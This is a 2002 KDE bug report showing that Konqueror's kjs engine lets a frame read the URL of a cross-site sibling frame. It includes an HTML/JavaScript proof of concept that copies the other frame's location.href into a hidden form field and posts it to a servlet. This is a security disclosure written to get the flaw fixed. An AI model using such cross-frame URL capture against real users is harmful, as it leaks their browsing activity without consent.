Bug 44162

(*** This bug was imported into bugs.kde.org ***)

Package:           kjs
Version:           KDE 3.0.1 
Severity:          normal
Installed from:    Compiled From Sources
Compiler:          2.95.3 20010315
OS:                Solaris
OS/Compiler notes: Solaris 8/Sparc Architecture

location.href is allowing javascript to read the URL of other browser frames. eg if I write the following set webpages :

menu.html

<HTML>
<HEAD>

<script language="javascript">

    <!--
      function doForm()
      {
        document.myForm.frameurl.value=window.parent.main.location.href;

        document.myForm.submit();
        return true;
      }
  // -->

</script>

</HEAD>
<BODY>
<BR>
<FORM METHOD="POST" ACTION="/servlets/demoServlets.ShowParams" NAME="myForm">
<INPUT TYPE="HIDDEN" NAME="frameurl">
<INPUT TYPE=BUTTON VALUE="  Click Me  " OnClick="doForm()">
</FORM>

</BODY>
</HMTL>

Now if I set this up as the menu part of a frameset with the other frame named main every time the 'click me' button is pressed konqueror happily sends me back the URL of whatever is being viewed in the main window. In some circumstances this is OK if the page in the main frame comes from the same webserver/directory as the script but if the page in the main frame is from a completely different website it ought to block this netscape/mozilla/ie all do.

I've put an example of what should and should not work on http://mork.cs.bham.ac.uk/frames/

This has potential privacy implications !

I've managed to demonstrate this bug in kde 3.0.1/linux as well as solaris.


(Submitted via bugs.kde.org)